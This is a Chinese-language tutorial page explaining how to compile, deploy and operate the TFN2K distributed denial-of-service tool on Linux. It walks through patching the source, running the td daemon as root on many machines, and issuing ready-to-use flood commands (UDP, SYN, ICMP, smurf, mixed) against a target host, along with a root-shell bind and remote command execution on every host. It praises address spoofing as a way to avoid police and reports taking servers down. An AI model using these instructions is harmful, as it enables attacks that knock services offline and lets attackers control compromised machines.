萬盛學電腦網

 萬盛學電腦網 >> Linux教程 >> Linux操作系統中實現DDOS攻擊的方法

Linux操作系統中實現DDOS攻擊的方法

class="6958">

  軟件用的是最有名的DDOS,首先說我們用來攻擊的客戶機和服務器的配置方法,使用當下最有名的REDHAT Linux進行測試,本次攻擊測試我使用的是FEDORA CORE3。

  開始設置服務器:

  解壓 tar -zxvf tfn2k.tgz
  1.安裝TFN2K
  TFN2K為開放原代碼的軟件,所以需要我們進行編譯,這個不用說了,編譯應該都會的吧,但有幾個地方是必需注意的,因為使用不同版本和廠商的Linux需要不同的設置。
  先修改src/ip.h
  注釋掉以下部分,否則編譯出錯。
  /*struct in_addr
  {
  unsigned long int s_addr;
  }; */
  然後make進行編譯
  編譯時會提示你輸入服務器端進行密碼設置8-32位,(攻擊的時候需要輸入密碼)編譯後會出現兩個新的執行文件td 和 tfn,其中td是守護進程,也是客戶機的使用進程。而tfn是服務器控制進程,如果想攻擊別人就必需先起動td這個進程,然後再運行服務器進程,否則攻 擊無效,更改密碼可以執行mkpass進行更改。最後在所有的客戶機中安裝並運行td(需要ROOT權限),並且在服務器上建立一個文本文件,文件中記錄 所有的客戶機IP地址(用VI編輯一個就可行了),格式為:
  192.168.0.1
  192.168.0.2
  192.168.0.3
  IP
  IP
  .....
  然後在主服務器上運行./tfn
  2.DDOS攻擊實現
  ./tfn直接回車大家可以看到一些參數,英文好的朋友估計不用我來多講了:)
  格式./tfn <參數>
  無用的參數我們不提,我們來說攻擊用的
  -f 這個參數後面跟剛才所寫的文本文件名,就是真正實現DDOS攻擊,而不是DOS
  -h DOS攻擊,也就是單機,一對一的攻擊 後面跟一個主機或IP地址
  -p 後面指定一個端口,不用說了
  -c 最關鍵的參數,一共有11個選相
  0 - 停止攻擊,發善心用的
  1 - 反欺騙等級設定 ,因為TFN這個工具在攻擊的時候所發出的數據包是帶有源地址的,但是源地址是隨機的,也就是說地址不是你自給的,所以不用擔心警察抓,哈哈
  2 - 改編數據包的包尺寸:缺省的ICMP/8,smurf,udp攻擊缺省使用最小包。你可以通過改變每個包的有效載荷的字節增加它的大小。
  3 - 綁定root shell:啟動一個會話服務,然後你連接一個指定端口就可以得到一個root shell。
  4 - UDP洪水攻擊:這個攻擊是利用這樣一個事實:每個udp包被送往一個關閉的端口,這樣就會有一個ICMP不可到達的信息返回,增加了攻擊的能力。
  5 - SYN洪水攻擊:這個攻擊有規律的送虛假的連接請求。結果會是目標端口拒絕服務,添瞞TCP連接表,通過對不存在主機的TCP/RST響應增加攻擊潛力,是標准的拒絕服務攻擊.
  6 - ICMP響應(ping)攻擊:這個攻擊發送虛假地址的ping請求,目標主機會回送相同大小的響應包。
  7 - SMURF攻擊:用目標主機的地址發送ping請求以廣播擴大,這樣目標主機將得到回復一個多倍的回復。
  8 - MIX攻擊:按照1:1:1的關系交替的發送udp,syn,icmp包,這樣就可以對付路由器,其它包轉發設備,NIDS,sniffers等,輪番轟炸:)
  9 - TARGA3攻擊
  10 - 遠程命令執行,這個參數是TFN的附加功能,其實TFN的攻擊不僅僅是DOS,還可以遠程的進行明令控制,如:
  ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i後面跟"命令"
  參數基本說完,下面攻擊
  ./tfn -f hostext -c 4 -i www.xxx.com
  使用hostext文件中記錄的主機對163服務器進行UDP攻擊(所有的主機中必需已經起動td進程)
  ./tfn -f hostext -c 5 -i www.xxx.com -p 80
  使用hostext文件中記錄的主機對163服務器進行TCP拒絕服務攻擊(80攻擊WEB,其他不用說了)
  ./tfn -f hostext -c 6 -i www.xxx.com
  使用hostext文件中記錄的主機對163服務器進行ICMP攻擊(PING攻擊,緩沖區溢出馬上死機)
  ./tfn -f hostext -c 8 -i www.xxx.com
  使用hostext文件中記錄的主機對163服務器進行ICMP&TCP&UDP輪番攻擊(如果對方是sniffer一定哭死)
  ./tfn -f hostext -c 0
  讓所由主機停止攻擊
  基本說完,最後說說我的測試結果
  一對一攻擊,攻擊方式TCP 連接方式本地 本地CPU13% 被攻擊的服務器CPU使用率70%以上,並時時波動
  二對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器CPU使用率100%
  五對一攻擊,攻擊方式TCP 連接方式本地 本地單機CPU13% 被攻擊的服務器死機.本人家裡只有6台機器,但如果再多點,幾十台機器,一般的個人服務器肯定要死掉了
  一對一攻擊,攻擊方式ICMP 連接方式本地 本地CPU18% 被攻擊的服務器CPU使用率96%以上,並時時波動二對一攻擊,攻擊方式ICMP 連接方式本地 本地單機CPU18% 被攻擊的服務器以經無法上網,幾乎無法使用,半小時內死機。

copyright © 萬盛學電腦網 all rights reserved